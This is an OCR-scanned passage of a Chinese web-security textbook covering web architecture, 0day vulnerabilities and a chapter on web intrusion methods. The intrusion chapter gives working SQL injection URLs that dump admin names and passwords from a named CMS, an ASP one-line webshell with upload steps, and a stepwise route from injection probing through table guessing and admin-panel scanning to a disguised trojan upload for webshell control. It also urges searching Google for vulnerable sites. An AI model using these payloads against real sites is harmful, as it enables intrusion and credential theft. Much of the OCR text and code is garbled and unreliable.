Session 把 用 户 的 一 些 参数 信息 存在 服务 器 的 内 存 中 ， 或 写 在 服务 器 的 硬盘 文件 中 ， 用 户 
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是 不 可 见 的 ， 这 样 用 户 用 不 同 的 电脑 访问 时 的 贵宾 待遇 就 同样 了 ，Web 服务 器 总 能 记 住 你 
的 “样子 ”， 一 般 情 况 下 ，Cookies 与 Session 可 以 结合 使 用 。 

Cookies 在 用 户 端 ， 一 般 采 用 加 密 方式 存放 就 可 以 了 ; Session 在 服务 器 端 ， 信 息 集 
中 ， 被 算 改 的 问题 会 很 严重 ， 所 以 一 般 放 在 内 存 里 管理 ， 尽 量 不 存放 在 硬盘 上 。 

总 之 ，Web 服务 器 上 有 两 种 服务 用 数据 要 保证 安全 : 一 是 页 面 文件 (html、.xml 等 )， 
这 里 包括 动态 程序 文件 .php、.asp、Jjsp 等 )， 一 般 存在 于 Web 服务 器 的 特定 目录 中 ， 或 是 
中 间 服 务 器 上 ; 二 是 后 台 的 数据 库 ， 如 Oracle、SQL Server 等 ， 其 中 有 存放 数据 的 动态 网 
页 生成 时 需要 的 数据 ， 也 有 业务 管理 数据 、 经 营 数 据 。 


5.1.2” Web 应 用 的 架构 


尽管 不 同 的 网 站 会 有 不 同 的 Web 环境 搭建 方式 ， 但 一 个 典型 的 Web 应 用 通常 是 标准 
的 三 层 架 构 模 型 。 如 图 5-1 所 示 的 Web 环境 三 层 模 型 。 


eb 服务 器 应 用 服务 上 


~ J 防火 墙 
客户 端 1 (表示 层 )( 业 务 逻 辑 层 jl 
:\ 和 , 
(浏览 器 ) 中 间 层 数据 层 


5-1 ”Web 环境 三 层 模型 


这 种 最 常见 的 模型 中 ， 客 户 端 是 第 一 层 ， 使 用 动态 Web 内 容 技术 的 部 分 属于 中 间 
层 ; 数据 库 是 第 三 层 。 用 户 用 Web 浏览 器 发 送 请 求 (Request) 给 中 间 层 ， 由 中 间 层 将 用 户 
的 请 求 转换 为 到 后 台数 据 的 查询 或 是 更 新 ， 并 将 最 终 的 结果 在 浏览 器 上 展示 给 用 户 。 


Web 安全 的 必要 性 


很 多 人 认为 在 企业 Web 应 用 的 各 个 层面 ， 都 会 使 用 不 同 的 技术 来 确保 安全 。 为 了 保 
护 客户 端 机 器 的 安全 ， 用 户 会 安装 防 病毒 软件 。 为 了 保证 用 户 数据 传输 到 企业 Web 服务 
器 的 传输 安全 ， 通 信 层 通常 会 使 用 SSL( 安 全 套 接 层 ) 技 术 加 密 数据 。 使 用 防火 墙 和 IDS( 入 
侵 诊 断 系 统 )MIPS( 入 侵 防御 系统 ) 来 保证 仅 允 许 特定 的 访问 。 不 必要 暴露 的 端口 和 非法 访 
问 ， 在 这 里 都 会 被 阻止 。 即 使 有 防火 墙 ， 企 业 依 然 会 使 用 认证 机 制 来 授权 用 户 访问 Web 
应 用 。 有 些 专业 的 公司 为 了 提升 安全 系数 ， 增 加 了 Honeypot( 蜜 镀 系 统 体系 )， 主 动 有 意 暴 
露 虚 拟 的 陷阱 给 黑客 ， 从 而 记录 入 侵 。 在 很 大 程度 上 ，Honeypot 可 以 尽早 的 查 明 和 预警 
黑客 在 网 络 上 的 非法 操作 。 

“没有 不 透风 的 墙 ”， 即 便 有 防 病毒 保护 、 防 火 墙 IDS/IPS， 企 业 仍 然 不 得 不 允许 一 
部 分 通信 进 过 防火 墙 。 毕 竟 Web 应 用 的 目的 是 为 用 户 提供 服务 ， 保 护 措施 可 以 关闭 不 必 
要 暴露 的 端口 ， 但 是 应 用 服务 必需 的 80 和 443 等 端口 是 一 定 要 开放 的 。 所 以 顺利 通过 防 
火 墙 的 这 部 分 通信 ， 可 能 是 善意 的 ， 也 可 能 是 恶意 的 ， 很 难 分 辨 。 需 要 注意 的 是 ，Web 应 
用 是 由 软件 构成 的 ， 那 么 它 一 定 会 包含 Bug 和 漏洞 ， 这 些 Bug、 漏 洞 有 可 能 被 恶意 的 用 户 
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(黑客 ) 利 用 ， 他 们 通过 执行 各 种 恶意 操作 ， 或 偷窃 重要 信息 ， 或 操控 成 为 跳板 ， 或 有 针对 
性 的 破坏 Web 应 用 中 的 重要 信息 。 

除了 来 自 外 部 的 Web 安全 隐患 ， 还 有 来 自 内 部 的 安全 威胁 ， 然 而 往往 很 多 网 管 不 重 
视 网 络 内 部 的 Web 安全 防范 。 如 图 5-2 所 示 ， 服 务 器 区 与 内 网 没有 访问 控制 ， 内 网 可 以 
随意 访问 服务 器 。 


5-2 不 重视 内 部 网 络 的 服务 器 安全 


很 多 黑客 通过 入 侵 内 部 PC 或 者 其 他 安全 性 很 低 的 终端 ， 虽 然 这 些 PC、 终 端 可 能 没 
有 存储 很 有 价值 的 信息 和 数据 ， 但 是 这 些 机 器 往往 会 成 为 黑客 成 功 入 侵 一 个 企业 Web 站 
点 的 桥梁 (跳板 )， 致 使 Web 服务 从 内 部 网 络 遭 受 破坏 。 黑 客 甚 至 可 以 得 到 Web 服务 器 及 
其 他 服务 器 的 管理 控制 权 。 从 而 巧妙 地 绕 过 IDS/IPS 和 防火 墙 的 检测 与 防护 ， 最 终 达 到 入 
侵 Web 站 点 的 目的 。 

所 以 对 于 一 个 网 络 管理 员 来 说 ， 为 了 保障 企业 或 机 构 的 Web 服务 安全 ， 保 护 重 要 数 
据 不 被 盗 取 和 破坏 ， 不 仅 要 考虑 Web 站 点 本 身 编程 应 注意 避免 的 漏洞 ， 还 要 注意 网 络 服 
务 设备 软件 、 硬 件 的 必要 安全 设置 ， 以 及 对 于 内 部 网 络 的 安全 管理 。 


5.2 Web 的 入 侵 方 法 


本 节 主 要 介绍 各 式 各 样 的 针对 Web 站 点 的 入 侵 方法 。 


5.2.1 0Day(Zero Day Attack) 


0Day 的 概念 最 早 用 于 软件 和 游戏 破解 ， 属 于 非 盈 利 性 和 非 商业 化 的 组 织 行为 ， 其 基 
本 内 涵 是 “即时 性 ”。Warez 被 许多 人 误 认 为 是 一 个 最 大 的 软件 破解 组 织 ， 而 实际 上 ， 
Warez 如 黑客 一 样 ， 只 是 一 种 行为 。0Day 也 是 。 当 时 的 0Day 是 指 在 正版 软件 或 游戏 发 布 
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的 当天 甚至 之 前 ， 发 布 附带 着 序列 号 或 者 解密 器 的 破解 版 ， 让 使 用 者 可 以 不 用 付费 就 能 长 
期 使 用 。 因 此 ， 虽 然 Warez 和 0Day 都 是 反 盗版 的 重要 打击 对 象 ， 却 同时 受到 免费 使 用 者 
和 业内 同行 的 推崇 。 尽 管 Warez 和 0Day 的 拥护 者 对 以 此 而 谋 利 的 盗版 商 不 齿 ， 但 商业 利 
益 的 驱动 还 是 将 破解 行为 的 商业 化 推 到 了 高 峰 。 而 眼下 的 0Day， 正 在 对 信息 安全 产生 越 
来 越 严重 的 威胁 。 

但 是 这 不 是 我 们 今天 意义 上 指 的 0Day， 信 息 安全 意义 上 的 0Day 是 指 在 安全 补丁 发 布 
前 而 被 了 解 和 掌握 的 漏洞 信息 。 

2005 年 12 月 8 日 ， 几 乎 影响 Windows 所 有 操作 系统 的 WMEF 漏洞 在 网 上 公开 ， 虽 然 
微软 在 8 天 后 提前 发 布 了 安全 补丁 (微软 的 惯例 是 在 每 月 的 第 一 个 周二 )， 但 就 在 这 8 天 内 
出 现 了 200 多 个 利用 此 漏洞 的 攻击 脚本 。 漏 洞 信息 的 公开 ， 加 速 了 软件 生产 企业 安全 补丁 
的 更 新 进程 ， 减 少 了 恶意 程序 的 危害 程度 。 但 如 果 是 不 公开 的 0Day 呢 ? WME 漏洞 公开 
之 前 ， 又 有 多 少 人 已 经 利用 了 它 ? 是 否 有 很 多 0Day 一 直 在 秘密 流传 ? 例如 ， 给 全 球 网 络 
带 来 巨大 危害 的 “冲击 波 ” 和 “震荡 波 ” 这 两 种 病毒 ， 如 果 它 们 的 漏洞 信息 没有 公开 ， 自 
然 也 就 没有 这 两 种 超级 病毒 的 产生 。 反 过 来 想 ， 有 什么 理由 认为 眼下 不 存在 类 似 的 有 着 重 
大 安全 隐患 的 漏洞 呢 ? (Dtlogin 远程 溢出 漏洞 于 2002 年 被 发 现 ， 然 而 在 2004 年 才 公布 ) 

看 不 见 的 才 是 最 可 怕 的 ， 这 就 是 0Day 的 真正 威胁 。 

0 Day 漏洞 是 危害 最 大 的 漏洞 ， 当 然 对 攻击 者 来 说 也 是 最 有 价值 的 漏洞 。 毕 竟 只 是 被 
少数 攻击 者 掌握 ， 并 且 大 多 数 情况 下 ， 也 不 会 有 人 浮躁 到 写 出 蠕虫 来 攻击 整个 网 络 。 但 有 
时 0Day 漏洞 会 被 曝光 ， 那 意味 着 全 世界 的 黑客 都 知道 这 个 漏洞 ， 也 懂得 怎么 去 利用 它 。 
这 时 在 厂商 的 官方 补丁 发 布 前 ， 整 个 网 络 将 处 于 高 度 预警 状态 。 

下 面 是 良 精 网 站 管理 系统 0Day 的 实例 。 

1)” 爆 用 户 (%20 意思 是 空格 ) 

http://www.xxx.com/hitcount.asp?lx=LiangJingCMS_DownSort&id=1%20and%201=2 
%20union%620select%20adminname%%20from2620LiangjingCMS_admin 

注解 : 黑体 部 分 语句 的 执行 SQL 语句 为 SELECT title, description, body FROM 
hitcount WHERE ID = 1 and 1 = 2( 含 义 是 and 1=2 是 个 假 命题 ， 所 以 这 条 SQL 语句 and 条 
件 永远 无 法 成 立 。 就 不 会 返回 结果 给 用 户 ， 页 面 结果 将 是 空 )。 

而 后 面 斜 体 语句 才 是 攻击 者 所 要 执行 的 union 并 列 显 示 select 筛选 关键 词 adminname 
有 关 的 所 有 项 ， 来 源 是 从 LiangjingCMS_admin 这 个 数据 库 表 中 读 取 的 。 

这 句 URL 后 执行 的 语句 的 目的 就 是 先 使 数据 库 查 询 出 错 显示 空白 页 面 同 时 并 列 从 
LiangjingCMS_admin 表 中 筛选 出 和 adminname 有 关 的 信息 显示 出 来 。 

如 果 不 行 试 试 下 面 的 : 

http://www.xxx.com/hitcount.asp?lx=LiangJing DownSort&id=1%20and%201=2%20 
union%20select%20adminname%20from%20Liangjing_ admin 

注解 : 这 个 是 和 上 面 注解 一 样 的 ， 只 不 过 查询 的 表 名 改 成 了 “Liangjing admin”。 

2) ” 爆 密 码 

http://www.xxx.com/hitcount.asp?lx=LiangJingCMS_ DownSort&id=1%20and%201=2 
%20union%620select%620password%%20from?%%20LiangjingCMS _admin 

注解 : 黑体 语句 的 执行 SQL 语句 为 SELECT title, description, body FROM hitcount 
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WHERE ID = 1 and 1 一 2( 含 义 是 and 1=2 是 个 假 命题 ， 所 以 这 条 SQL 语句 and 条 件 永远 无 
法 成 立 。 就 不 会 返回 结果 给 用 户 ， 页 面 结果 将 是 空 )。 

而 后 面 斜 体 语句 才 是 攻击 者 所 要 执行 的 union 并 列 显示 select 筛选 与 关键 词 password 
有 关 的 所 有 项 ， 来 源 是 从 LiangjingCMS_admin 这 个 数据 库 表 中 读 取 的 。 

这 名 URL 后 执行 的 语句 的 目的 就 是 先 使 数据 库 查 询 出 错 显示 空白 页 面 同时 并 列 从 
LiangjingCMS_admin 表 中 筛选 出 和 adminname 有 关 的 信息 显示 出 来 。 

如 果 不 行 试 试 下 面 的 : 

http://www.xxx.com/hitcount.asp?lx=LiangJing DownSort&id=1%20and%201=2%20 
union%20select%20password%20from%20Liangjing_ admin 

注解 : 意思 大 致 同上 ， 只 不 过 是 从 表 Liangjing_admin 筛选 的 。 

我 们 可 以 在 Google 搜索 包含 LiangjingCMS 的 网 站 ， 图 5-3 和 图 5-4 是 我 们 挑选 的 任 
意 网 站 执行 语句 的 返回 结果 。 


n/ch/hitcount.asp?ht =Liang JingCMS_DownSorttid=1 and 1=2 union select adminna - Windows Internet Explorer 
PND MD ED WN TND Wo | 多 
加 银 -加 -站 国友 | 万 拉 窜 收 天 石 | 过 国 - 

地 址 (D) [ 色 ] htp:/fwww mchyhtcount asp7b Lang ng CHS _DownSorteed=1%20andoe201 =2%2D roon 


ountasp?tx=LiangJingCMS_DownSort&id=1 and 
文件 (久久 (查看 收藏) 工具 (D 太 动 (HD 

加 扫 - 昌 -四 辐 光 | 站 扫 要 容 收 天 全 | 国 - 

地 址 (D) [如] peep://www. lcnjch/hecount .asp7be=Liang ingCMS_DownSortesd=1%20and%201=2%20urson%20select 20passwordm20from%20UangingcM5_admn ”| 园 转 到 | 链接 


document. write (52d37 4 ; 


5-4 执行 URL 语句 返回 后 台 密码 


以 上 良 精 网 站 CMS 系统 的 0Day 是 最 近 出 现 的 ， 管 理 系统 的 设计 上 忽略 了 数据 库 执 
行 语句 select 的 过 滤 ， 从 而 可 以 执行 查询 用 户 和 密码 ， 并 且 显 示 出 来 。 近 年 来 编程 开发 人 
员 的 安全 意识 日 益 增强 ， 这 种 语句 未 过 滤 的 现象 少 之 又 少 。 


5.2.2 ASP 上 传 漏洞 


ASP 上 传 漏洞 是 利用 一 些 网 站 的 ASP 上 传 功能 来 上 传 ASP 木马 的 一 种 入 侵 方 式 。 不 
少 网 站 都 限制 了 上 传 文件 的 类 型 ， 一 般 来 说 ASP 为 后 级 的 文件 都 不 允许 上 传 ， 但 是 这 种 
限制 是 可 以 被 黑客 突破 的 ， 黑 客 可 以 采取 Cookies 欺骗 、 留 言 板 插 入 空 值 或 者 上 传 图 片 木 
马 的 方式 获得 网 站 的 Webshell 权限 。 

一 句 话 入 侵 是 ASP 上 传 漏洞 的 典型 应 用 。 


1. 一 句 话 木马 的 适用 环境 


服务 器 的 来 宾 账户 有 写 入 权限 。 
己 知 数据 库 地 址 且 数 据 库 格 式 为 asa 或 asp。 
在 数据 库 格式 不 为 asa 或 asp 的 情况 下 ， 如 果 能 将 一 句 话 插入 到 asp 文件 中 也 
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可 以 。 
2. 一 句 话 入 侵 原理 


eval (Request .form('#"')+"'") 


eval 函数 计算 一 个 表达 式 的 值 并 返回 结果 。[result = ]Eval(expression) 参数 result 可 
选项 ， 是 一 个 变量 ， 用 于 接受 返回 的 结果 。 
如 果 未 指定 结果 ， 应 考虑 使 用 Execute 语句 代替 。 


<%execute request( “#” )%> 


我 们 仔细 观察 一 下 <%execute request(“#”)9%6> 这 名 代码 ， 括 号 里 的 “#” 是 我 们 需要 
设置 的 一 句 话 密码 ， 我 们 可 以 把 它 改 成 任意 字符 ， 密 码 是 和 客户 端 文件 里 textarea 
name=”#” 对 应 的 ， 这 样 才能 连接 成 功 。 

execute() 函 数 ， 是 用 来 执行 asp 代码 的 。 就 是 负责 执行 我 们 上 传 的 木马 ， 将 木马 交 由 
asp.dll 解析 。 如 图 5-5 所 示 。 上 面 的 代码 <%execute request("a")%> 可 以 这 样 来 解释 : 


<% if request("a")<>"" then execute request ("a") 务 > 


上 面 代 码 的 意思 是 首先 创建 一 个 流 对 象 ip， 然 后 使 用 该 对 象 的 writetext 方法 将 
request("liuyes1") 读 取 过 来 的 内 容 ( 就 是 我 们 常见 的 一 句 话 客户 端的 第 二 个 textarea 标记 中 
的 内 容 ， 即 我 们 的 大 马 的 代码 ) 写 入 服务 端的 help.asp 文件 中 ， 写 入 结束 后 使 用 set 
IP=nothing 释放 Adodb.Stream 对 象 ， 然 后 使 用 response.redirect "help.asp" 重 定向 转向 刚 
才 写 入 木马 代码 的 文件 ， 也 就 是 我 们 最 后 看 见 的 木马 了 。 


NOLANGUAGE=" VBScript. Encode” CODEPAGE="936"%> 
chtnl> 


eta http-equiv="Content-Type” content="text/htal; charset=eb2312"> 
《title> 网 站 小 助手 </title> 

<style type= "text/css > 

< 


TA 
.black { 


font-fanily: “宋体; 
font-size: 12px: 


图 5-5 一 旬 话 上 传 页 面 


下 一 步 需要 的 是 在 搜索 网 站 目录 里 数据 库 地 址 文件 名 为 *.asa 或 者 *.asp， 我 们 需要 用 
到 一 些 网 站 目录 扫描 软件 这 里 就 不 多 做 介绍 。 我 们 在 客户 端 中 写 入 网 站 数据 库 地 址 ， 在 下 
方 栏 中 写 入 木马 ， 然 后 提交 ， 就 可 以 在 对 方 网 站 目录 生成 *.asp 木马 页 面 。 

最 后 我 们 在 浏览 器 中 直接 访问 生成 的 asp 页 面 ， 用 事先 配置 好 的 木马 密码 登录 ， 这 样 
我 们 就 得 到 了 目的 服务 器 权限 。 

不 过 一 句 话 木马 能 成 功 依赖 于 两 个 条 件 : 首先 服务 器 端 没有 禁止 Adodb.Stream 组 
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件 ， 因 为 使 用 一 句 话 入 侵 写 入 木马 代码 的 条 件 是 服务 器 端 创建 Adodb.Stream 组 件 ， 如 果 
该 组 件 被 禁用 的 话 是 不 会 写 入 成 功 的 。 还 有 就 是 权限 的 问题 ， 如 果 当 前 的 虚拟 目录 禁止 
user 组 或 者 everyone 写 入 操作 也 不 会 成 功 。 


5.2.3 ”注入 漏洞 

对 存在 漏洞 的 程序 ， 用 户 可 以 提交 一 段 数 据 库 查询 代码 ， 根 据 程序 返回 的 结果 ， 获 得 
非 正常 用 户 能 得 到 的 数据 ， 如 管理 员 ID、 密 码 、 账 户 信息 ， 甚 至 控制 数据 库 ， 通 过 数据 
库 入 侵 系 统 。 这 个 就 是 SQL 注入 式 攻 击 (SQLinjection)。 

对 于 网 站 的 入 侵 ， 注 入 还 是 很 流行 。 很 多 人 都 会 用 工具 入 侵 网 站 ， 却 并 不 了 解 工具 的 
原理 ， 下 面 介绍 一 下 SQL 注入 的 原理 。 

注入 ， 主 要 是 SQL SERVER 数据 库 。SQL 注入 的 步骤 是 : 找 出 注入 点 并 判断 是 否 存 
在 漏洞 一 判断 数据 库 的 类 型 一 猜 解数 据 库 的 具体 信息 一 找到 后 台 入 口 一 上 传 木马 ， 得 到 
Webshell。 


1. 找 出 注入 点 并 判断 是 否 存 在 漏洞 

以 下 下 面 的 网 站 作为 例子 ， 形 如 : http://www.****.com/abc.asp?id=xx 的 asp 动态 网 
页 ，xx 是 参数 ， 参 数 可 能 只 有 一 个 ， 也 可 能 有 n 个 ， 可 能 是 整 型 参数 ， 也 可 能 是 字符 型 
参数 ， 总 之 只 要 访问 了 数据 库 就 很 有 可 能 存在 注入 ， 现 在 要 分 两 种 情况 判断 。 

1)” 整 型 参数 的 判断 

当 xx 为 整数 型 时 ， 这 时 SQL 语句 如 下 : 

select * from 表 名 where 字段 一 xx 

用 以 下 方法 判断 : 

http://www.****.com/abc.asp?id=xx' (加 一 个 单 引 号 ) 

@ ”SQL 语句 变 成 了 select* from 表 名 where 字段 一 xx' abc.asp 运行 异常 。 

@ http://www.****.com/abc.asp?id=xx and 1=] abcasp 运行 正常 而 且 与 

http://www.****.com/abc.asp?id=xx 运行 结果 相同 。 

@ http://www.****.com/abc.asp?id=xx and 1=2 abc.asp 运行 异常 。 

如 果 满 足以 上 3 点 ， 说 明 abc.asp 一 定 存 在 注入 漏洞 。 

2) ”字符 串 型 参数 的 判断 

当 xx 为 字符 串 型 时 ， 这 时 SQL 语句 如 下 : 

select * from 表 名 where 字段 ='xx' 


用 以 下 方法 判断 : 

http://www.****.com/abc.asp?id=xx' (加 一 个 单 引号 ) 

@ SQL 语句 变 成 了 select * from 表 名 where 字段 二 xx' abc.asp 运行 异常 。 

@ http://www.****.com/abc.asp?id-xx and "1='1' abcasp 运行 正常 而 且 与 
http://www.****.com/abc.asp?id=xx 运行 结果 相同 。 

@ http://www.****.com/abc.asp?id=xx and ']='2' abc.asp 运行 异常 。 
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如 果 满 足以 上 3 点 ， 说 明 abc.asp 一 定 存在 注入 漏洞 。 
2. 判断 数据 库 类 型 


现在 使 用 最 多 的 数据 库 就 是 Access 和 SQL Server。 常 见 的 判断 方法 有 以 下 两 种 。 

1) “利用 系统 变量 判断 数据 库 

SQL Server 数据 库 中 有 user、db_name() 的 系统 变量 。 

执行 http://www.****.com/abc.asp?id=xx and user>0 不 仅 可 以 判断 是 否 是 SQL Server 
数据 库 ， 而 且 还 可 以 得 到 当前 连接 到 数据 库 的 用 户 名 。 

执行 http://www.****.com/abc.asp?id=xx and db_name()>0 不 仅 可 以 判断 是 否 是 SQL 
Server 数据 库 ， 而 且 还 可 以 得 到 当前 正在 使 用 的 数据 库 名 。 

2) “利用 系统 表 来 判断 数据 库 

上 面 是 用 系统 变量 判断 ， 还 可 以 利用 系统 表 来 判断 ，Access 的 系统 表 是 
msysobjects， 而 且 在 Web 环境 下 没有 访问 权限 ， 而 SQL Server 的 系统 表 是 sysobjects， 在 
Web 环境 下 有 访问 权限 ， 所 以 借助 系统 表 来 判断 。 


http://www.****.com/abc.asp?id=xx and (select * from sysobject)>0 
http://www.****.com/abc.asp?id=xx and (select * from msysobjects)>0 


如 果 第 一 条 运行 正常 ， 而 第 二 条 运行 异常 ， 则 是 SQL Server; 如 果 两 条 都 运行 异常 ， 
则 是 Access。 


3. 猜 解数 据 库 的 具体 信息 
1) “ 猜 解 所 有 数据 库 名 称 


http://www.****.com/abc.asp?id=xx and (select count (*) from 
master .dbo.sysdatabases where name>1l and dbid=6) <>0 


因为 从 1 到 5 是 系统 用 的 ， 所 以 用 户 自己 建立 的 一 定 是 从 6 开始 的 abc.asp 异常 得 到 
第 一 个 数据 库 名 ， 把 dbid 改 成 7、8、9、10 等 ， 可 以 得 到 所 有 的 数据 库 名 。 假 设 得 到 的 
数据 库 名 是 jiaowu。 

2) ” 猜 解 数据 库 用 户 名 表 名 称 

数据 库 的 用 户 名 表 的 名 称 一 般 是 user、users、member、members、userlist、admin、 


adminuser、systemuser、systemusers 等 。 


http://www.****.com/abc。 asp?id=xx and (select count (*) from 
jiaowu.dbo。 表 名 ) >0 


如 果 abc.asp 正常 说 名 存在 表 名 ， 一 直 循 环 猜 到 所 有 表 名 。 假 设 用 户 名 表 名 称 为 
admin 。 

3) ” 猜 解 用 户 名 字段 和 密码 字段 名 称 

用 户 名 字段 一 般 常 用 有 usemame、name、user 等 ， 密 码 字 段 有 password、pass、pwd、 
passwd 等 。 


http://www.****#.com/abc. asp?id=xx and (select count (字段 名 ) from 
jiaowu.Dbo.admin) >0 


如 果 abc.asp 运行 正常 说 明 存 在 ， 一 直 循环 猜 解 。 
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4. 找到 后 台 入 口 
互联 网 上 有 很 多 可 用 工具 ， 例 如 啊 D 注入 工具 ， 如 图 5-6 所 示 ; 多 线程 后 台 扫描 等 诸 
多 工具 ， 如 图 5-7 所 示 。 喜 欢 字符 界面 入 侵 操作 的 还 有 些 字符 界面 的 扫描 软件 。 


站 Pp 注入 工具 v2.32 增强 版 连 钥 技术 论坛 Http:/ /www.darkst.com 回回 外 
网 站 地 址 | ED 


| 可 用 和 连接 和 目录 位 置 
http-1/rrr mm en/ sdnin/ sdnin login ssp 


潮 找 管理 入 口 完成 用 


5-6 啊 D 注入 工具 


陵 老 栏 : 和 序 已 受 稚 各 就 结 By:New4 
图 5-7 多 线程 后 台 扫描 工具 


这 些 软件 的 共同 特点 就 是 从 字典 文件 (一 个 叫 *.txt 的 dictionary 网 络 后 台 目 录 ， 如 图 5-8 
所 示 ) 里 读 取 后 台 的 地 址 列表 。 当 扫描 对 方 网 站 目录 发 现 此 页 面 存在 时 就 会 报告 。 
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a main. asp 


aa 
|/aad asp 

ad_ login_ asp 
/adnincp. asp 


|/adnin_index 
/adnin_index. asp 
/adnin_login 
adnin_ login. asp 
/adnin_main. asp 
|/Adnin_SoftInfo. asp 


/adminl23 


图 5-8 网 站 后 台 目 录 字 典 
5. 上 传 木马 得 到 Webshell 


当成 功 进入 后 台 管理 时 总 会 找到 类 似 于 图 片上 传 的 界面 。 可 以 把 事先 准备 好 的 个 人 后 
台 木 马上 传 上 去 (有 些 后 台 上 传 还 是 比较 严格 的 ， 只 允许 图 片 格式 或 者 Flash 文件 上 传 )， 
所 以 需要 把 木马 改 成 如 *.jpg 的 格式 ， 上 传 成 功 后 会 出 现 上 传 后 木马 的 位 置 ， 如 图 5-9 所 示 。 


图 片 地 址 1: [7plowiPiles/201151316421376 pe 


[ 
图 5-9 网 站 后 台 图 片上 传 功能 


接 下 来 的 任务 就 是 让 木马 从 服务 器 上 运行 起 来 。 可 以 寻找 后 台 的 数据 库 备份 选项 ， 如 
5-10 所 示 ， 在 来 源 处 写 上 被 上 传 的 木马 文件 的 目录 地 址 。 在 目标 处 写 上 木马 转 存 到 的 
位 置 ， 为 了 隐蔽 性 可 以 转 存 到 后 台 同 目录 改 成 admln.asp 或 者 adtmln.aspx。 


| 数据 库 损 作 : 系 六 数 固 备 分 ， 球 第 ,信人 黎 ,管理 员 型 录 日 老 
栏目 首页 | 网 站 数据 库 : 备份 压缩 恢复 | 流量 数据 库 : 备份 压缩 恢复 


说 明 : 修改 数据 库 备份 保存 路 径 和 文件 名 ， 请 进入 [系统 设置 站 点 常量 设置 ~ 数据 库 备份 路 径 ] 
来 源 :Database/8Database sdb 


目标 : Tr 


确定 备份 


5-10 ”网 站 后 台数 据 库 备 份 功能 


最 后 在 地 址 栏 登 录 我 们 的 网 站 后 台 ， 入 侵 上 传 的 木马 后 台 管 理 界 面 如 图 5-11 所 示 。 
至 此 我 们 就 得 到 了 网 站 Webshell 权限 。 如 果 想 进一步 提升 权限 ， 可 以 利用 自己 的 后 台 自 
由 发 挥 。 
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当 站 长 助手 -修改 版 本 


地 十 栏 : [5 webroot\schzre web\iplovaPiles 
TS0 文 件 拘 作 模块 可 
本 地 而 备 CC:) 服务 器 失败 信息 
本 考生 0 服务 器 各 rm 
Ci\progrel 服务 器 1 二 
CVDocone 1 服务 器 时 间 a 
外 点 根 目录 服务 器 CF 入 县 
本 程序 目录 服务 器 作 有 系统 
疡 建 目录 ER 服务 器 版本 Werosoft-I1S/6.0 
新 建文 本 Seripting FileSystesDbject True 文件 操作 姐 件 
文件 上 全 模块 True 命令 行 执行 组 件 
aed True ACCESs 建 库 姐 件 
Fe roe ACCESS 压 纺 组 件 
下 芝 2 Tu 小 各 流 上 全 缚 助 担 件 
PY Irae 小 据 库 连 接 组件 
A Ira 涩 据 流 上 传 组 件 
ke, False Sh-Filelp 文件 上 传 组 件 
Fi Fuse 刘 云 作文 件 上 传 组 件 
搜索 文件 Fuse spisloud 文件 上 传 组 伯 
直接 提 权 Fuse Jsil 邮件 收发 组 件 
批量 挂 马 CDoITS Herllail False 虚拟 S8TP 发 全 组 件 
退出 登录 Sotplail Satplsil 1 False Smtplil 发 信和 组件 
大 全 再 半 要 Mierosoft XWLATTP True 数据 传 第 组 件 


5-11 入 侵 上 传 的 木马 后 台 管理 界面 


5.2.4 ”Cookies 欺骗 


Cookies 的 工作 原理 是 : 第 一 次 由 服务 器 端 写 入 到 客户 端的 系统 中 ， 以 后 每 次 访问 这 
个 网 页 ， 都 先 由 客户 端 将 Cookies 发 送 到 服务 器 端 ， 再 由 服务 器 端 进行 判断 ， 然 后 产生 
HTML 代码 返回 给 客户 端 。 因 此 服务 器 可 以 根据 不 同 用户 产 生 不 同 的 Cookies 文件 ， 这 样 
当 该 用 户 再 次 访问 同一 站 点 时 ， 就 可 以 根据 不 同 的 Cookies 文件 返回 不 同 的 页 面 信息 了 。 

如 果 我 们 现在 已 经 知道 了 X X 站 管理 员 的 账号 和 MD5 密码 ， 但 是 破解 不 出 密码 来 。 
我 们 就 可 以 用 Cookies 诈骗 来 实现 ， 把 自己 的 ID 修改 成 管理 员 的 ，MD5 密码 也 修改 成 他 
的 ， 用 工具 可 以 修改 Cookies， 这 样 就 达到 了 Cookies 诈骗 的 目的 ，Web 服务 系统 会 以 为 
你 就 是 管理 员 了 。 

不 知道 大 家 上 网 注意 到 没有 ， 很 多 社区 论坛 为 了 方便 网 友 浏 览 ， 都 使 用 了 Cookies 技 
术 以 避免 多 次 输入 密码 。 即 使 是 用 户 关 闭 了 标签 页 ， 但 是 浏览 器 没 关 ， 此 时 恢复 关闭 页 ， 
会 发 现 论坛 账号 依然 处 于 登录 状态 ， 这 就 是 Cookies 的 作用 。 所 以 ， 只 要 对 服务 器 递交 给 
用 户 的 Cookies 进行 改写 ， 就 可 以 达到 欺骗 服务 程序 的 目的 。 

Cookies 按照 正常 运作 ， 只 有 访问 同一 域名 时 才 可 以 读 写 。 下 面 以 验证 码 漏洞 的 
Cookies 欺骗 为 例 ， 讲 述 Cookies 欺骗 的 过 程 。 

几 年 前 许多 网 站 甚至 桌面 应 用 程序 都 陆续 实现 了 验证 码 技术 ， 主 要 作用 是 防止 用 户 利 
用 程序 进行 自动 提交 ， 避 免 暴力 破解 ， 避 免 服务 器 遭受 恶意 攻击 。 

目前 主流 的 实现 技术 主要 有 session 和 Cookies 两 种 ， 两 者 区 别 在 于 将 验证 码 字 符 串 
存储 在 服务 器 端 还 是 客户 端 。 

Cookies 验证 码 工作 流程 : 服务 器 发 送 验 证 码 图 片 以 及 验证 码 字 符 串 (可 能 会 进行 加 密 ) 
到 客户 端 ， 客 户 端 将 验证 码 字 符 串 存储 到 本 地 Cookies， 用 户 辨认 图 片 并 提交 验证 码 字符 
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串 以 及 Cookies 中 所 存储 的 字符 串 到 服务 器 ， 服 务 器 将 用 户 提交 的 两 个 字符 串 (进行 解密 后 ) 
进行 比较 。 

session 验证 码 的 工作 流程 : 服务 器 发 送 验证 码 图 片 到 客户 端 并 在 服务 器 保存 验证 码 字 
符 串 到 session， 用 户 辨 认 图 片 并 提交 验证 码 字 符 串 到 服务 器 ， 服 务 器 将 用 户 提交 的 验证 码 
字符 串 与 session 中 保存 的 字符 串 进行 比较 。 

相对 而 言 ， 存 放 在 服务 器 的 session 更 为 安全 ， 但 是 这 种 方式 虽然 更 为 安全 但 消耗 服 
务 器 内 存 ， 程 序 员 除 了 使 用 模式 识别 辨认 出 验证 码 外 ， 没 有 其 他 办 法 。 而 对 于 使 用 
Cookies 方式 的 验证 码 ， 既 不 增加 服务 器 内 存 消耗 ， 也 可 以 通过 对 传输 数据 进行 分 析 ， 轻 
易 破解 验证 码 。 

我 们 随便 进入 一 个 需要 验证 码 的 腾讯 页 面 : http://Web2.qq.com。 

